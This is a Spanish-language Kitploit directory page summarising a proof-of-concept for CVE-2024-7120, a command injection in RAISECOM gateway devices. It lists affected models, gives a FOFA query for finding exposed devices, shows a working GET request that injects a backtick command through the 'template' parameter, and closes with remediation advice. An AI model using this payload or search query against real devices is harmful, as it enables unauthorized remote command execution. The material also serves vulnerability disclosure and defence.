Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-7120 — Prueba de concepto de exploit para la vulnerabilidad de inyección de comandos CVE-2024-7120 en dispositivos gateway RAISECOM. Proporciona detalles de explotación, modelos afectados y ejemplos de ataques basados en curl para pruebas de seguridad. | Kitploit
Herramientas/GitHubGitHub/gh-ost00/cve-2024-7120
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubgh-ost00/cve-2024-7120

CVE-2024-7120

Prueba de concepto de exploit para la vulnerabilidad de inyección de comandos CVE-2024-7120 en dispositivos gateway RAISECOM. Proporciona detalles de explotación, modelos afectados y ejemplos de ataques basados en curl para pruebas de seguridad.

Ver Repositorio
822hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Inyección de Comandos en Dispositivos Raisecom (CVE-2024-7120) ¡Prueba de concepto!

Resumen

Se ha identificado una vulnerabilidad de inyección de comandos en los dispositivos Gateway de RAISECOM, que afecta a los modelos MSG1200, MSG2100E, MSG2200 y MSG2300. Esta vulnerabilidad permite a atacantes remotos ejecutar comandos arbitrarios en el sistema a través de la interfaz web. El problema reside en el script list_base_config.php, específicamente a través del parámetro template, afectando a más de 25.112 dispositivos en Internet.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

banner

Dispositivos Afectados

Hardware

  • Modelos Gateway de RAISECOM MSG1200, MSG2100E, MSG2200, MSG2300

Software

  • 3.90

Componentes Afectados

URI: /vpn/list_base_config.php

Descripción: list_base_config.php es un componente de interfaz web de los dispositivos Gateway de RAISECOM utilizado para gestionar configuraciones de VPN. La vulnerabilidad identificada surge debido al manejo inadecuado del parámetro template en este script. Este parámetro puede ser explotado para ejecutar comandos arbitrarios en el sistema operativo del dispositivo debido a una sanitización insuficiente de las entradas.

CWE

CWE-77: Inyección de Comandos

Explotación

A continuación se muestra un ejemplo de cómo se puede explotar la vulnerabilidad mediante un comando curl:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

En este ejemplo, el comando curl envía una solicitud HTTP GET maliciosa al script list_base_config.php. La solicitud utiliza el parámetro template para ejecutar un comando.

Resultado Real

Muestra 1

banner

Muestra 2

banner

Recomendaciones

  1. Validación de Entradas: Implemente comprobaciones de validación estrictas en todas las entradas de usuario, especialmente en aquellas que puedan afectar a comandos del sistema o rutas de archivos.
  2. Controles de Acceso: Restrinja el acceso a la interfaz web del dispositivo a redes de confianza y usuarios autenticados.
Descargar herramienta